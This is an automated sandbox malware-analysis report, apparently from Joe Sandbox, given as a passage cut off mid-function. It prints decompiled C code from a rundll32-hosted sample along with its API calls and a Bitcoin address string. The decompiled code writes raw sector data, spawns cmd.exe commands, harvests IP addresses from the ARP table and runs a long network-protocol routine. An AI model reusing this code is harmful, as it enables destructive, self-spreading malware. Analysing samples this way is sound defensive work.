      • Part of subcall function 011E1384: CreateFileA.KERNEL32(00000000,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 011E13AD
      • Part of subcall function 011E1384: GetLastError.KERNEL32(?,?,011E1852,00000000,00000000), ref: 011E13BA
      • Part of subcall function 011E1384: SetFilePointerEx.KERNEL32(00000000,00000020,00000000,00000000,00000000), ref: 011E13DC
      • Part of subcall function 011E1384: WriteFile.KERNEL32(00000000,011E1852,00000200,00000000,00000000), ref: 011E13F4
      • Part of subcall function 011E1384: GetLastError.KERNEL32(?,?,011E1852,00000000,00000000), ref: 011E13FE
      • Part of subcall function 011E1384: CloseHandle.KERNEL32(00000000), ref: 011E1415
    Strings
    • 1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX, xrefs: 011E16BD
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    Function 011E83BD, Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 81
    C-Code - Quality: 100%
    			E011E83BD(void* __eax, signed int _a4) {
				struct _PROCESS_INFORMATION _v20;
				struct _STARTUPINFOW _v88;
				short _v1648;
				short _v3696;
				char* _t20;
				char* _t21;
				int _t26;
				void* _t35;
				long _t36;
				long _t37;
				int _t38;
				void* _t39;

				_t39 = __eax;
				_t38 = 0;
				wsprintfW( &_v3696, L"/c %ws", __eax);
				 *((short*)(_t39 + 0x7fe)) = 0;
				if(GetEnvironmentVariableW(L"ComSpec",  &_v1648, 0x30c) != 0 || GetSystemDirectoryW( &_v1648, 0x30c) != 0 && lstrcatW( &_v1648, L"\\cmd.exe") != 0) {
					_t35 = 0x10;
					_t20 =  &_v20;
					do {
						 *_t20 = 0;
						_t20 = _t20 + 1;
						_t35 = _t35 - 1;
					} while (_t35 != 0);
					_t36 = 0x44;
					_t37 = _t36;
					_t21 =  &_v88;
					do {
						 *_t21 = 0;
						_t21 = _t21 + 1;
						_t37 = _t37 - 1;
					} while (_t37 != 0);
					_v88.cb = _t36;
					_t26 = CreateProcessW( &_v1648,  &_v3696, 0, 0, 0, 0x8000000, 0, 0,  &_v88,  &_v20); // executed
					_t38 = _t26;
					if(_t38 != 0) {
						Sleep(_a4 * 0x3e8); // executed
					}
					goto L9;
				} else {
					L9:
					return _t38;
				}
			}















    0x011e83c9
    0x011e83da
    0x011e83dc
    0x011e83e7
    0x011e8408
    0x011e8434
    0x011e8435
    0x011e8438
    0x011e8438
    0x011e843a
    0x011e843b
    0x011e843b
    0x011e8440
    0x011e8441
    0x011e8443
    0x011e8446
    0x011e8446
    0x011e8448
    0x011e8449
    0x011e8449
    0x011e846c
    0x011e846f
    0x011e8475
    0x011e8479
    0x011e8485
    0x011e8485
    0x00000000
    0x011e848b
    0x011e848b
    0x011e8491
    0x011e8491

    APIs
    • wsprintfW.USER32 ref: 011E83DC
    • GetEnvironmentVariableW.KERNEL32(ComSpec,?,0000030C), ref: 011E8400
    • GetSystemDirectoryW.KERNEL32(?,0000030C), ref: 011E8412
    • lstrcatW.KERNEL32(?,\cmd.exe), ref: 011E8428
    • CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 011E846F
    • Sleep.KERNELBASE(011E85C7), ref: 011E8485
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    Function 011EA0FE, Relevance: 16.6, APIs: 11, Instructions: 142
    C-Code - Quality: 94%
    			E011EA0FE() {
				signed int _v8;
				long _v12;
				long _v16;
				void _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _v40;
				void* _v44;
				intOrPtr _t43;
				unsigned int _t44;
				signed int _t47;
				void* _t54;
				intOrPtr _t55;
				signed int _t56;
				signed int _t58;
				void* _t63;
				void* _t64;
				void* _t65;
				signed int _t67;
				int _t75;
				signed int _t79;
				void* _t83;
				void** _t85;
				void* _t91;

				_t43 =  *0x11ff140; // 0x2e8160
				_v24 = _t43;
				_t44 =  *0x11ff144; // 0x3
				_t47 =  !(_t44 >> 2) & 0x00000001;
				_v20 = _t47;
				if(_t47 != 0) {
					_push(0); // executed
					E011E9F8E(); // executed
				}
				_v44 = _v44 & 0x00000000;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t83 = HeapAlloc(GetProcessHeap(), 8, 8);
				if(_t83 == 0) {
					L27:
					return 0;
				} else {
					 *_t83 = _v20;
					_t54 = HeapAlloc(GetProcessHeap(), 8, 0x21);
					 *(_t83 + 4) = _t54;
					_t94 = _t54;
					if(_t54 == 0) {
						goto L27;
					}
					_t55 = E011E6F40(_v24, _t94, _t54);
					_t75 = 0;
					_v28 = _t55;
					if(_t55 == 0) {
						goto L27;
					}
					_v8 = 0;
					_v16 = 0;
					while(1) {
						_v12 = _t75;
						if(_v8 == 4) {
							goto L10;
						}
						_t65 = CreateThread(_t75, _t75, E011EA073, _t83, _t75, _t75); // executed
						if(_t65 == 0) {
							L26:
							E011E6F78(_v28);
							goto L27;
						}
						 *(_t91 + _v8 * 4 - 0x28) = _t65;
						_t75 = 0;
						L11:
						_t56 = 0;
						while( *((intOrPtr*)(_t91 + _t56 * 4 - 0x28)) != _t75) {
							_v12 = _v12 + 1;
							_t56 = _t56 + 1;
							if(_t56 != 4) {
								continue;
							}
							break;
						}
						_t58 = WaitForMultipleObjects(_v12,  &_v44, _t75, _v16);
						if(_t58 == 0xffffffff) {
							goto L26;
						}
						if(_t58 != 0x102) {
							__eflags = _t58 - _v12 - 1;
							if(_t58 <= _v12 - 1) {
								_t85 = _t91 + _t58 * 4 - 0x28;
								_v8 = _t58;
								CloseHandle( *_t85);
								 *_t85 =  *_t85 & 0x00000000;
								__eflags =  *_t85;
							}
							L23:
							_t83 = HeapAlloc(GetProcessHeap(), 8, 8);
							if(_t83 == 0) {
								goto L26;
							}
							_t63 = HeapAlloc(GetProcessHeap(), 8, 0x21);
							_t78 = _v20;
							 *(_t83 + 4) = _t63;
							 *_t83 = _v20;
							if(_t63 == 0) {
								goto L26;
							}
							_t64 = E011E6F02(_t78, _t63); // executed
							if(_t64 != 0) {
								_t75 = 0;
								__eflags = 0;
								continue;
							}
							goto L26;
						}
						_t79 = 4;
						_v8 = _t79;
						_t67 = 0;
						while( *((intOrPtr*)(_t91 + _t67 * 4 - 0x28)) != 0) {
							_t67 = _t67 + 1;
							if(_t67 != _t79) {
								continue;
							}
							goto L23;
						}
						_v8 = _t67;
						goto L23;
						L10:
						_t18 =  &_v16;
						 *_t18 = _v16 | 0xffffffff;
						__eflags =  *_t18;
						goto L11;
					}
				}
			}



























    0x011ea104
    0x011ea109
    0x011ea10c
    0x011ea116
    0x011ea119
    0x011ea11c
    0x011ea11e
    0x011ea120
    0x011ea120
    0x011ea125
    0x011ea137
    0x011ea138
    0x011ea13d
    0x011ea149
    0x011ea14d
    0x011ea26b
    0x011ea271
    0x011ea153
    0x011ea15a
    0x011ea15f
    0x011ea161
    0x011ea164
    0x011ea166
    0x00000000
    0x00000000
    0x011ea170
    0x011ea175
    0x011ea177
    0x011ea17c
    0x00000000
    0x00000000
    0x011ea182
    0x011ea185
    0x011ea198
    0x011ea19c
    0x011ea19f
    0x00000000
    0x00000000
    0x011ea1ab
    0x011ea1b3
    0x011ea263
    0x011ea266
    0x00000000
    0x011ea266
    0x011ea1bc
    0x011ea1c0
    0x011ea1c8
    0x011ea1c8
    0x011ea1ca
    0x011ea1d0
    0x011ea1d3
    0x011ea1d7
    0x00000000
    0x00000000
    0x00000000
    0x011ea1d7
    0x011ea1e4
    0x011ea1ed
    0x00000000
    0x00000000
    0x011ea1f4
    0x011ea215
    0x011ea217
    0x011ea219
    0x011ea21f
    0x011ea222
    0x011ea228
    0x011ea228
    0x011ea228
    0x011ea22b
    0x011ea234
    0x011ea238
    0x00000000
    0x00000000
    0x011ea241
    0x011ea243
    0x011ea246
    0x011ea249
    0x011ea24d
    0x00000000
    0x00000000
    0x011ea256
    0x011ea25d
    0x011ea196
    0x011ea196
    0x00000000
    0x011ea196
    0x00000000
    0x011ea25d
    0x011ea1f8
    0x011ea1f9
    0x011ea1fc
    0x011ea1fe
    0x011ea205
    0x011ea208
    0x00000000
    0x00000000
    0x00000000
    0x011ea20a
    0x011ea20c
    0x00000000
    0x011ea1c4
    0x011ea1c4
    0x011ea1c4
    0x011ea1c4
    0x00000000
    0x011ea1c4
    0x011ea198

    APIs
    • GetProcessHeap.KERNEL32(00000008,00000008), ref: 011EA13E
    • HeapAlloc.KERNEL32(00000000), ref: 011EA147
    • GetProcessHeap.KERNEL32(00000008,00000021), ref: 011EA15C
    • HeapAlloc.KERNEL32(00000000), ref: 011EA15F
    • CreateThread.KERNEL32(00000000,00000000,Function_0000A073,00000000,00000000,00000000), ref: 011EA1AB
    • WaitForMultipleObjects.KERNEL32(?,00000000,00000000,000000FF), ref: 011EA1E4
    • CloseHandle.KERNEL32(00000000), ref: 011EA222
    • GetProcessHeap.KERNEL32(00000008,00000008), ref: 011EA22F
    • HeapAlloc.KERNEL32(00000000), ref: 011EA232
    • GetProcessHeap.KERNEL32(00000008,00000021), ref: 011EA23E
    • HeapAlloc.KERNEL32(00000000), ref: 011EA241
      • Part of subcall function 011E6F78: GetProcessHeap.KERNEL32(00000000,011E9F85,?,011E9F85,?), ref: 011E6F80
      • Part of subcall function 011E6F78: HeapFree.KERNEL32(00000000,?,011E9F85), ref: 011E6F87
      • Part of subcall function 011E9F8E: GetCurrentThread.KERNEL32(0000000B,00000001,?), ref: 011E9FA7
      • Part of subcall function 011E9F8E: OpenThreadToken.ADVAPI32(00000000), ref: 011E9FAE
      • Part of subcall function 011E9F8E: DuplicateTokenEx.ADVAPI32(?,02000000,00000000,00000002,00000002,?), ref: 011E9FC9
      • Part of subcall function 011E9F8E: CloseHandle.KERNEL32(?), ref: 011EA05B
      • Part of subcall function 011E9F8E: CloseHandle.KERNEL32(?), ref: 011EA068
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    Function 011E786B, Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 90
    C-Code - Quality: 25%
    			E011E786B(intOrPtr _a4) {
				long _v8;
				long _v12;
				void* _v16;
				long _v20;
				intOrPtr _v24;
				short _v88;
				void* __esi;
				void* _t24;
				void* _t29;
				void* _t33;
				void* _t44;
				signed char* _t46;
				long _t49;
				intOrPtr* _t51;
				void* _t54;

				_t51 = __imp__GetIpNetTable;
				_t49 = 0;
				_v20 = 0;
				_v8 = 0;
				_t24 =  *_t51(0,  &_v8, 0); // executed
				if(_t24 != 0xe8) {
					if(_t24 != 0x7a) {
						L15:
						return _v20;
					}
					_t44 = HeapAlloc(GetProcessHeap(), 0, _v8);
					_v16 = _t44;
					if(_t44 == 0) {
						L14:
						goto L15;
					}
					_t29 =  *_t51(_t44,  &_v8, 0); // executed
					if(_t29 != 0) {
						L13:
						HeapFree(GetProcessHeap(), _t49, _t44);
						goto L14;
					}
					_v20 = 1;
					_v12 = 0;
					if( *_t44 <= 0) {
						goto L13;
					}
					_v24 = 3;
					_t46 = _t44 + 0x16;
					do {
						_push(4);
						asm("repe cmpsb");
						if(0 != 0) {
							asm("sbb eax, eax");
							asm("sbb eax, 0xffffffff");
						}
						if(0 == 0) {
							wsprintfW( &_v88, L"%u.%u.%u.%u",  *(_t46 - 2) & 0x000000ff,  *(_t46 - 1) & 0x000000ff,  *_t46 & 0x000000ff, _t46[1] & 0x000000ff);
							_t54 = _t54 + 0x18;
							E011E6FC7( &_v88, 0, _a4);
						}
						_v12 = _v12 + 1;
						_t33 = _v16;
						_t46 =  &(_t46[0x18]);
					} while (_v12 <  *_t33);
					_t44 = _t33;
					_t49 = 0;
					goto L13;
				}
				return 0;
			}


















    0x011e7872
    0x011e7879
    0x011e7881
    0x011e7884
    0x011e7887
    0x011e788e
    0x011e789a
    0x011e7951
    0x00000000
    0x011e7951
    0x011e78b2
    0x011e78b4
    0x011e78b9
    0x011e7950
    0x00000000
    0x011e7950
    0x011e78c5
    0x011e78c9
    0x011e7941
    0x011e794a
    0x00000000
    0x011e794a
    0x011e78cb
    0x011e78d2
    0x011e78d7
    0x00000000
    0x00000000
    0x011e78d9
    0x011e78e0
    0x011e78e3
    0x011e78e3
    0x011e78ee
    0x011e78f0
    0x011e78f2
    0x011e78f4
    0x011e78f4
    0x011e78f9
    0x011e7917
    0x011e791d
    0x011e7928
    0x011e7928
    0x011e792d
    0x011e7930
    0x011e7936
    0x011e7939
    0x011e793d
    0x011e793f
    0x00000000
    0x011e793f
    0x00000000

    APIs
    • GetIpNetTable.IPHLPAPI(00000000,?,00000000), ref: 011E7887
    • GetProcessHeap.KERNEL32(00000000,?,00000000), ref: 011E78A5
    • HeapAlloc.KERNEL32(00000000), ref: 011E78AC
    • GetIpNetTable.IPHLPAPI(00000000,?,00000000), ref: 011E78C5
    • wsprintfW.USER32 ref: 011E7917
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 011E7943
    • HeapFree.KERNEL32(00000000), ref: 011E794A
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    Function 011E5A7E, Relevance: 14.4, APIs: 9, Instructions: 901
    C-Code - Quality: 74%
    			E011E5A7E(signed int* __ecx, void* __eflags, void* _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40) {
				signed int _v5;
				signed int _v12;
				signed int _v13;
				char _v17;
				char _v20;
				signed int _v21;
				signed int _v24;
				char _v25;
				char _v28;
				char _v29;
				char _v32;
				char _v33;
				signed int _v36;
				intOrPtr _v37;
				signed int _v40;
				intOrPtr _v41;
				signed int _v44;
				signed int _v45;
				char _v48;
				intOrPtr _v49;
				signed int _v52;
				intOrPtr _v53;
				char _v54;
				signed int _v56;
				char _v57;
				char _v60;
				intOrPtr _v61;
				signed int _v64;
				intOrPtr _v65;
				signed int _v68;
				int _v72;
				intOrPtr _v73;
				signed int _v76;
				char _v80;
				signed int _v84;
				intOrPtr _v88;
				void* _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t369;
				signed short _t370;
				signed short _t371;
				signed int _t374;
				signed int _t386;
				signed int _t389;
				signed int _t391;
				signed int _t395;
				signed int _t398;
				signed int _t400;
				signed int _t401;
				void* _t402;
				intOrPtr* _t406;
				signed int _t416;
				signed int _t420;
				void* _t424;
				signed int _t427;
				signed short _t428;
				signed int _t430;
				signed int _t434;
				signed int _t435;
				signed int _t436;
				signed int _t437;
				signed int _t440;
				signed int _t441;
				signed int _t444;
				signed int _t447;
				signed int _t450;
				signed int _t452;
				signed int _t454;
				signed int _t459;
				signed int _t461;
				signed int _t463;
				signed int _t465;
				signed int _t467;
				signed int _t469;
				signed int _t471;
				signed int _t473;
				signed int _t475;
				signed int _t477;
				signed int _t479;
				signed int _t481;
				signed int _t483;
				signed int _t485;
				signed int _t487;
				signed int _t489;
				signed int _t491;
				signed int _t493;
				signed int _t495;
				signed int _t497;
				signed int _t499;
				signed int _t501;
				signed int _t503;
				signed int _t505;
				signed int _t507;
				signed int _t509;
				signed int _t511;
				signed int _t513;
				signed int _t515;
				signed int _t520;
				signed int _t521;
				signed int _t523;
				signed int _t525;
				signed int _t527;
				signed int _t529;
				signed int _t531;
				signed int _t533;
				signed int _t535;
				signed int _t537;
				signed int _t539;
				signed int _t541;
				signed int _t542;
				signed int _t544;
				signed int _t545;
				signed int _t548;
				signed int _t550;
				intOrPtr* _t557;
				char _t561;
				intOrPtr _t564;
				signed int _t567;
				signed int _t572;
				void* _t579;
				void* _t586;
				signed int _t606;
				intOrPtr _t607;
				intOrPtr _t608;
				intOrPtr _t609;
				signed int _t611;
				void* _t618;
				int _t620;
				char* _t621;
				signed int _t624;
				intOrPtr _t628;
				intOrPtr* _t635;

				_t568 = __ecx;
				while(1) {
					_v57 = 0;
					_t369 = E011E6727( &_a4,  &_v57,  &_a4, _a8, _a12); // executed
					if(_t369 != 0) {
						break;
					}
					_t370 = E011E20B2();
					_t611 = 0;
					_v40 = _t370 & 0x0000ffff;
					_v44 = 0xfeff;
					_v48 = 0;
					_v56 = 0;
					_t371 = E011E20B2();
					_t557 = _a4;
					_v52 = _t371 & 0x0000ffff;
					_v28 = 0;
					_v36 = 0;
					_v24 = 0;
					_v20 = 0;
					_t369 = E011E2EF5( *_t557, _t568, 0xc007, _t370 & 0x0000ffff, 0xfeff, _t371 & 0x0000ffff); // executed
					__eflags = _t369;
					if(_t369 != 0) {
						break;
					} else {
						_t369 = E011E2F88( *_t557, _t568, 0xc007, _v40, 0xfeff,  &_v56, _v52, 0xd, 0, 0,  &_v36,  &_v24); // executed
						__eflags = _t369;
						if(_t369 != 0) {
							break;
						} else {
							_t379 = _v36;
							__eflags = _v36;
							if(_v36 == 0) {
								L99:
								_push(_v52);
								_push(_v56);
								_push(0xfeff);
								_push(_t611);
								goto L100;
							} else {
								_v36 = E011E22A2(_t379, _v24);
								E011E20D0( &_v40);
								__eflags = _v36 - 0xff;
								if(_v36 == 0xff) {
									_t611 = 0;
									__eflags = 0;
									goto L99;
								} else {
									_t386 = E011E3061( *_t557, _t568, _v40,  &_v48, 0xfeff, _v56, _v52); // executed
									__eflags = _t386;
									if(_t386 != 0) {
										_push(_v52);
										_push(_v56);
										_push(0xfeff);
										_push(_v48);
										L100:
										_push(_v40);
										_push( *_t557); // executed
										E011E31FB(_t568); // executed
										_t369 = E011E2068(_t557);
										break;
									} else {
										_t369 = E011E1000(0xc);
										_v12 = _t369;
										__eflags = _t369;
										if(_t369 == 0) {
											break;
										} else {
											_t389 = E011E330E( &_v20,  *_t557, _v40, _v48, 0xfeff, _v56, _v52 + 1, 0xf0, _t369, 0, 0,  &_v20,  &_v40,  &_v24); // executed
											_v68 = _t389;
											E011E20D0( &_v60);
											__eflags = _v68 - 0xffffffff;
											if(_v68 == 0xffffffff) {
												L127:
												_push(_v52);
												_push(_v56);
												_push(0xfeff);
												goto L128;
											} else {
												_t391 = _v36;
												__eflags = _t391;
												if(_t391 == 0) {
													goto L127;
												} else {
													_t568 = 0x11;
													__eflags = _t568 -  *((intOrPtr*)(_t391 + 0x1a));
													if(_t568 ==  *((intOrPtr*)(_t391 + 0x1a))) {
														_t572 =  *(_t391 + 0x16);
														 *0x11ff8fc = 0xff;
														__eflags = _t572;
														if(_t572 == 0) {
															 *0x11ff8fc = _t572;
														}
														__eflags = _t572 - 1;
														if(_t572 == 1) {
															 *0x11ff8fc = _t572;
														}
														__eflags = _a16;
														if(_a16 != 0) {
															_v12 = (( *(_t391 + 0x12) & 0x00ff0000 |  *(_t391 + 0x12) >> 0x00000010) >> 0x00000008 | ( *(_t391 + 0x12) << 0x00000010 |  *(_t391 + 0x12) & 0x0000ff00) << 0x00000008) ^ _t392 + _t392;
															E011E20D0( &_v36);
															__eflags = _v12;
															if(_v12 == 0) {
																goto L127;
															} else {
																_v24 = _v24 & 0x00000000;
																_v44 = _v44 & 0x00000000;
																_t395 = 0;
																__eflags =  *0x11ff8fc - 1;
																if( *0x11ff8fc != 1) {
																	_t579 = 0x11f7090;
																	_t618 = 0x11f6020;
																} else {
																	_t395 = 1;
																	_t579 = 0x11ff900;
																	_t618 = 0x11f7860;
																}
																__eflags = _t395;
																__eflags = _t395;
																_a16(_a20, _a24, _t618, ((_t395 == 0x00000000) - 0x00000001 & 0x00000200) + 0x1070, _t579, ((0 | _t395 == 0x00000000) - 0x00000001 & 0xfffffa00) + 0x7ce,  &_v44,  &_v24, _a28, _a32, _a36, _a40);
																_v64 = _v64 & 0x00000000;
																_v68 = _v68 & 0x00000000;
																_t398 = E011E20EA(((_t395 == 0x00000000) - 0x00000001 & 0x00000200) + 0x1070,  &_v68,  &_v64, _v72, _v80);
																__eflags = _t398;
																if(_t398 != 0) {
																	goto L127;
																} else {
																	_t620 = _v64;
																	_t400 = _t620 + _v72 + 8;
																	_v76 = _t400;
																	_t401 = _t400 & 0x00000003;
																	__eflags = _t401;
																	if(_t401 != 0) {
																		_t586 = 4;
																		_t297 =  &_v76;
																		 *_t297 = _v76 + _t586 - _t401;
																		__eflags =  *_t297;
																	}
																	_t402 = E011E1000(_v76); // executed
																	_v84 = _t402;
																	__eflags = _t402;
																	if(_t402 == 0) {
																		L133:
																		_t621 =  &_v68;
																		goto L126;
																	} else {
																		__eflags = _v92;
																		if(_v92 == 0) {
																			goto L133;
																		} else {
																			memcpy(_t402, _v68, _t620);
																			_t406 = _v80 + _t620;
																			 *_t406 = _v72;
																			 *((intOrPtr*)(_t406 + 4)) = 1;
																			memcpy(_t406 + 8, _v92, _v72);
																			E011E20D0( &_v68);
																			_v84 = _v84 & 0x00000000;
																			_v68 = _v68 & 0x00000000;
																			_t624 = _v76 >> 0xc;
																			_v56 = _v76 & 0x00000fff;
																			__eflags = _t624;
																			if(_t624 == 0) {
																				L121:
																				Sleep(0x456);
																				__eflags = _v56;
																				if(_v56 <= 0) {
																					L123:
																					E011E20D0( &_v80);
																					goto L124;
																				} else {
																					_t416 = E011E3DD7(_v100 + 1,  *_t557, _v88, _v96, 0xfeff, _v104, _v100 + 1, _v60, _v56, _v80, _v76, _v84,  &_v68);
																					__eflags = _t416;
																					if(_t416 != 0) {
																						goto L125;
																					} else {
																						goto L123;
																					}
																				}
																			} else {
																				_v64 = _v64 & 0x00000000;
																				__eflags = _t624;
																				if(_t624 == 0) {
																					goto L121;
																				} else {
																					while(1) {
																						_t420 = E011E3DD7(_v100 + 1,  *_t557, _v88, _v96, 0xfeff, _v104, _v100 + 1, _v60, 0x1000, _v80, _v76, _v84,  &_v68); // executed
																						__eflags = _t420;
																						if(_t420 != 0) {
																							break;
																						}
																						_v84 = _v84 + 0x1000;
																						_v64 = _v64 + 1;
																						__eflags = _v64 - _t624;
																						if(_v64 < _t624) {
																							continue;
																						} else {
																							goto L121;
																						}
																						goto L131;
																					}
																					L125:
																					_t621 =  &_v80;
																					L126:
																					E011E20D0(_t621);
																					goto L127;
																				}
																			}
																		}
																	}
																}
															}
														} else {
															E011E20D0( &_v36);
															_push(_v52);
															_push(_v56);
															_push(0xfeff);
															_push(_v48);
															_push(_v40);
															_push( *_t557);
															_push(0xd04b1e);
														}
														goto L131;
													} else {
														E011E20D0( &_v36);
														_t424 = E011E35FA( *_t557, _t568, 0xffff, __eflags, 0x2801, _v40, _v48, 0xfeff, _v56, _v52, 2, 0xff, 0); // executed
														__eflags = _t424 - 0xc0000205;
														if(_t424 != 0xc0000205) {
															goto L127;
														} else {
															__eflags = _a16;
															if(_a16 == 0) {
																L124:
																_push(_v100);
																_push(_v104);
																_push(0xfeff);
																_push(_v96);
																_push(_v88);
																_push( *_t557);
																_push(0);
																goto L131;
															} else {
																__eflags =  *0x11ff8fd - 3;
																if( *0x11ff8fd >= 3) {
																	goto L127;
																} else {
																	 *0x11ff8fd =  *0x11ff8fd + 1;
																	__eflags = _v32 - 2;
																	if(_v32 == 2) {
																		L16:
																		_v12 = 0;
																		_t427 = E011E3EC8( &_v12, _t568,  *_t557, _v40, _v48, 0xfeff, _v56, _v52,  &_v28);
																		__eflags = _t427;
																		if(_t427 != 0) {
																			goto L127;
																		} else {
																			_t428 = rand();
																			_t628 = _v48;
																			_v44 = _t428 & 0x0000ffff;
																			_t430 = E011E407B(_t568,  &_v52,  *_t557, _v40, _t628, _t428 & 0x0000ffff, _v56, _v28);
																			__eflags = _t430;
																			if(_t430 != 0) {
																				L134:
																				_push(_v52);
																				_push(_v56);
																				goto L135;
																			} else {
																				_t606 = _v56;
																				__eflags = E011E42DF( *_t557, _v40, _t628, _v44, _t606,  &_v52, _v28);
																				if(__eflags != 0) {
																					L136:
																					_push(_v52);
																					_push(_t606);
																					L135:
																					_push(_v44);
																					_push(_t628);
																					goto L129;
																				} else {
																					_t568 =  &_v44;
																					_t434 = E011E489C( &_v52,  &_v44, __eflags,  *_t557, _v40, _t628, _t606, _v28);
																					__eflags = _t434;
																					if(_t434 != 0) {
																						goto L136;
																					} else {
																						_t435 = E011E4BA1( &_v44,  *_t557, _v40, _t628, _v44, _t606, _v28);
																						__eflags = _t435;
																						if(_t435 != 0) {
																							goto L136;
																						} else {
																							_t607 = _v28;
																							_t436 = E011E51F3(_t607,  *_t557, _v40, _t628, _v44, _t606);
																							__eflags = _t436;
																							if(_t436 != 0) {
																								goto L134;
																							} else {
																								_push(_v12);
																								_push(_t607);
																								_push(_v52);
																								_push(_v44);
																								_push(_t628);
																								_push(_v40);
																								_push( *_t557);
																								_t437 = E011E5333(_v56,  &_v44);
																								__eflags = _t437;
																								if(_t437 != 0) {
																									goto L137;
																								} else {
																									_t557 = _a4;
																									goto L24;
																								}
																							}
																						}
																					}
																				}
																			}
																		}
																	} else {
																		__eflags = _v32 - 3;
																		if(_v32 == 3) {
																			goto L16;
																		} else {
																			__eflags = _v32 - 4;
																			if(_v32 != 4) {
																				L24:
																				__eflags = _v29 - 5;
																				if(_v29 == 5) {
																					L27:
																					_t608 =  *_t557;
																					_v13 = _v13 & 0x00000000;
																					_t440 = E011E2547( &_v13, _v37, _v45, _v41, _v53, _v49);
																					_v45 = _t440;
																					__eflags = _t440;
																					if(_t440 == 0) {
																						L97:
																						_push(_v49);
																						_push(_v53);
																						_push(_v41);
																						L128:
																						_push(_v48);
																						L129:
																						_push(_v40);
																						_push( *_t557);
																						goto L130;
																					} else {
																						_t441 = E011E1000(0x1000);
																						_v21 = _t441;
																						__eflags = _t441;
																						if(_t441 == 0) {
																							E011E20D0( &_v25);
																							goto L97;
																						} else {
																							_v5 = _v5 & 0x00000000;
																							_t444 = E011E688F(_t608, _v25, _v13 & 0x0000ffff); // executed
																							__eflags = _t444;
																							if(_t444 != 0) {
																								L95:
																								E011E20D0( &_v17);
																								E011E20D0( &_v25);
																								goto L96;
																							} else {
																								_t561 = _v17;
																								_t447 = E011E243F(_t568, _t608, 1, _t561); // executed
																								__eflags = _t447;
																								if(_t447 != 0) {
																									goto L95;
																								} else {
																									E011E20D0( &_v17);
																									E011E20D0( &_v25);
																									__eflags =  *(_t561 + 9);
																									if( *(_t561 + 9) != 0) {
																										L96:
																										_t557 = _a4;
																										goto L97;
																									} else {
																										_t450 = E011E3B5D(_t568, _t608, _v37, _v45, _v41, _v53, _v49); // executed
																										__eflags = _t450;
																										if(_t450 != 0) {
																											goto L96;
																										} else {
																											Sleep(0x456); // executed
																											_t452 = E011E6727( &_a4,  &_v54,  &_a4, _a8, _a12); // executed
																											__eflags = _t452;
																											if(_t452 != 0) {
																												L137:
																												_push(_v49);
																												_push(_v53);
																												_push(_v41);
																												_push(_v45);
																												_push(_v37);
																												_push( *_a4);
																												goto L130;
																											} else {
																												_t564 = _v49;
																												_t609 = _v37;
																												_t635 = _a4;
																												_t454 = E011E2EF5( *(_t635 + 4), _t568, 0xc053, _t609, _v41, _t564); // executed
																												__eflags = _t454;
																												if(_t454 != 0) {
																													L138:
																													_push(_t564);
																													goto L139;
																												} else {
																													_v13 = _v13 & _t454;
																													_t459 = E011E2F88( *(_t635 + 4), _t568, 0xc007, _t609, _v41,  &_v13, _t564, 0xc, 0x12d, 0xfff0,  &_v33,  &_v21); // executed
																													__eflags = _t459;
																													if(_t459 != 0) {
																														goto L138;
																													} else {
																														_t565 =  &_v54;
																														_t461 = E011E6727( &_a4,  &_v54,  &_a4, _a8, _a12); // executed
																														__eflags = _t461;
																														if(_t461 != 0) {
																															L140:
																															_push(_v49);
																															L139:
																															_push(_v53);
																															_push(_v41);
																															_push(_v45);
																															_push(_t609);
																															_push( *_t635);
																															goto L130;
																														} else {
																															_t463 = E011E6727( &_a4,  &_v54,  &_a4, _a8, _a12); // executed
																															__eflags = _t463;
																															if(_t463 != 0) {
																																goto L140;
																															} else {
																																_t465 = E011E3CA0(0, _t568,  *((intOrPtr*)(_t635 + 8))); // executed
																																__eflags = _t465;
																																if(_t465 != 0) {
																																	goto L140;
																																} else {
																																	_t467 = E011E6727( &_a4,  &_v54,  &_a4, _a8, _a12); // executed
																																	__eflags = _t467;
																																	if(_t467 != 0) {
